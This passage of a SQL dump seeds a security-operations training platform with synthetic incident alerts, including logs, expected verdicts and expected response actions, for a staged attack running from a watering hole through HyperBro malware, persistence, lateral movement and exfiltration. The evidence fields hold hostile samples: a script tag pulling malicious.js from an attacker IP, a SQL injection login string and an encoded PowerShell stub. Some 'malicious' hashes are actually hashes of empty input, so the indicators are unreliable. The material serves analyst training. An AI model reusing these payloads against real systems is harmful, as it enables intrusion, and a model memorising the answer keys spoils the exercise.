hash\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_docs.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local File Database\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity for this user\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Employee of the organization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1177, 'Suspicious Website Activity Detected', 'high', 'Web Traffic Analysis', 'An advanced watering hole attack was detected. Malicious scripts were injected into a legitimate government website frequented by officials, establishing an initial access point in the infiltration strategy.', 'Watering Hole Attack', 'T1189', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T09:15:32Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"referrer\":\"https://gov-portal.example.com\",\"malicious_script\":\"<script src=\'http://203.0.113.45/malicious.js\'></script>\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious.js\",\"username\":\"jdoe\",\"event_id\":\"evt-2023-1014-0001\"}', '2026-02-07 21:22:02', '2026-02-22 20:45:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://203.0.113.45/malicious.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious script\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"gov-portal.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Whitelist\",\"verdict\":\"clean\",\"details\":\"Legitimate government portal\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1178, 'HyperBro Malware Execution Attempt', 'high', 'Endpoint Detection and Response (EDR)', 'The EDR detected an attempt to execute the HyperBro malware on the endpoint. Upon visiting the compromised site, the user unwittingly downloaded the malware, allowing attackers to initiate control over the infected device.', 'Malware Execution', 'T1204.002 - User Execution: Malicious File', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"3029\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"file_name\":\"setup.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"process_id\":\"4567\",\"event_type\":\"malware_execution\",\"url\":\"http://malicious-example.com/download\",\"action_taken\":\"quarantine\",\"detection_method\":\"behavioral_analysis\"}', '2026-02-07 21:22:02', '2026-02-23 11:17:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"Associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known HyperBro malware hash.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-example.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Malicious URL hosting malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"setup.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"Identified as a HyperBro payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1179, 'Establishing Persistence via Scheduled Task', 'high', 'System Logs', 'The attackers establish persistence on the compromised machines by creating a scheduled task that ensures HyperBro reloads even after system reboots. The task is configured to run at system start, executing a malicious script associated with the HyperBro RAT.', 'Persistence Mechanism', 'T1053.005', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"log_source\":\"Windows Event Log\",\"event_id\":106,\"level\":\"Information\",\"computer_name\":\"compromised-host\",\"user\":\"SYSTEM\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\UpdateTask\",\"task_action\":\"Create\",\"action_type\":\"Execute\",\"action_detail\":\"C:\\\\Windows\\\\Temp\\\\setup.exe\",\"task_parameters\":\"/c C:\\\\Windows\\\\Temp\\\\setup.exe\",\"attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\",\"internal_ip\":\"192.168.1.101\",\"username\":\"admin\"}', '2026-02-07 21:22:02', '2026-02-23 11:32:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C&C server associated with APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as HyperBro RAT payload.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Local administrator account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1180, 'Lateral Movement Detected within Network', 'high', 'Network Traffic Monitoring', 'Utilizing stolen credentials, the attackers move laterally across the network, accessing additional sensitive systems in search of valuable data. The detected traffic indicates unauthorized connections to multiple internal systems.', 'Network Intrusion', 'T1078: Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"destination_port\":3389,\"protocol\":\"RDP\",\"username\":\"jdoe\",\"event_type\":\"logon\",\"logon_type\":\"Network\",\"logon_status\":\"Success\",\"file_accessed\":\"\\\\\\\\192.168.1.15\\\\C$\\\\sensitive_data\\\\financial_report.xlsx\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_name\":\"explorer.exe\",\"additional_info\":\"Suspicious logon detected using stolen credentials for lateral movement.\"}', '2026-02-07 21:22:02', '2026-02-23 11:32:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Company internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"Account possibly compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"No known malware associated with hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1181, 'Suspicious Data Exfiltration Activity', 'critical', 'Data Loss Prevention (DLP) Systems', 'In the final stage, attackers initiate data exfiltration, using encrypted channels to stealthily transfer collected intelligence out of the compromised network.', 'Data Exfiltration', 'T1048.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T15:27:32Z\",\"event_type\":\"data_exfiltration\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"file_name\":\"sensitive_data_backup.zip\",\"file_hash\":\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\",\"bytes_sent\":104857600,\"exfiltration_channel\":\"encrypted_tunnel\",\"detection_method\":\"anomaly_detection_engine\"}', '2026-02-07 21:22:02', '2026-02-16 04:59:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_ip_reputation\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous data exfiltration incidents.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_data_backup.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"File hash not commonly seen in typical operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 